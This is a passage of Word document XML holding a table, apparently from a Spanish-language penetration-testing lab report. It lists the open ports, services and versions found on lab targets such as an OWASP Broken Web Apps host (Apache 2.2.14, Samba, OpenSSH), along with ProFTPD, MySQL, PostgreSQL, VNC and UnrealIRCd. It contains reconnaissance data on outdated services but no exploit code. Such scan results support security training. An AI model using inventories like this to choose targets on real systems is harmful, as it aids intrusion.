              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42B92A7E"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24082472"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1B6C23B5"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1EA28CC8"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2121</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CFF86B5"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51DFB47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ccproxy-ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E1BADA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ProFTPD 1.3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56E18069"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3E341D3D"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676AFD42"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0E82B0A2"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3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46BF00A8"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288903A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mysql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B5DD03F"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MySQL 5.0.51a-3ubuntu5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="490ACBAA"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CC5B8DE"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705276E3"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26A7D87B"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5432</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10289D7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012D62E1"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postgresql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45370F41"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PostgreSQL DB 8.3.0 - 8.3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C510F52"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0832C73"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4852150F"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0FFEB665"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5900</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39A80148"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7D45F0A8"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vnc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F2E648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VNC (protocol 3.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31D26BED"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15C34F79"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734D314F"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73699583"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6000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3499BF7F"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09543D3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X11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FBC09F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6BD64288"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2A0116D7"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00CC9660"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43B183F1"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6667</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C1F8EB2"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31B1EEF3"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irc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1228A12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UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BBBADA3"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59640B03"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06D5FAAB"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59FE2D50"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8009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="071D42F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089DA1BF"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ajp13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2252C47A"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Apache Jserv (Protocol v1.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C48369D"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61577AB1"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6E075418"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2A320D0A"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8980</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D2AF6E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544EAD38"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unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69582B1D"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767AD558"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6C7327A0"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740ABD87"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12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B15CD17"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49153</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E69DEA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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E9034DD"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tcpwrapped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D48EE1C"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61E36A55"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27DE14FF" w14:textId="77777777" w:rsidTr="001E62FF">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18C422C8" w14:textId="77777777" w:rsidR="007B59D0" w:rsidRPr="00837B5A" w:rsidRDefault="007B59D0" w:rsidP="007B59D0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>owaspbw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37771DA9"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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FB9AF6A"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418B593D"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ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19EB4A03"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OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72830830" w14:textId="77777777" w:rsidR="007B59D0" w:rsidRPr="00837B5A" w:rsidRDefault="007B59D0" w:rsidP="007B59D0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>LINUX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B59D0" w:rsidRPr="00837B5A" w14:paraId="0C5AC2C9"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0DD84259"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3C75FD4A"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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1582D92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57D060EA"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http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7022C50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xml:space="preserve">Apache httpd 2.2.14 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00EC8298"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D51E196"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10EF4A07"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46F7A594"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139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2597F559"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51AC1991"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netbios-ssn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="525DBF65"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Samba smbd 3.X - 4.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="718458DC"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C5CB802"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49482676"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6FF85727"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143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25346EA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6785BD54"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imap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10BD365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Courier Imapd (released 2008)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45DAF7AE"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D571CFF"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0C0C10DA"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45EF32DE"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443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="047F46E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21D057CD"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ssl/http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50C5105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xml:space="preserve">Apache httpd 2.2.14 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="330FB9C9"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02E2DB68"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12005FB2"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3363E949"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445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AF9632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6C5D632C"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netbios-ssn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55B27BEE"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Samba smbd 3.X - 4.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
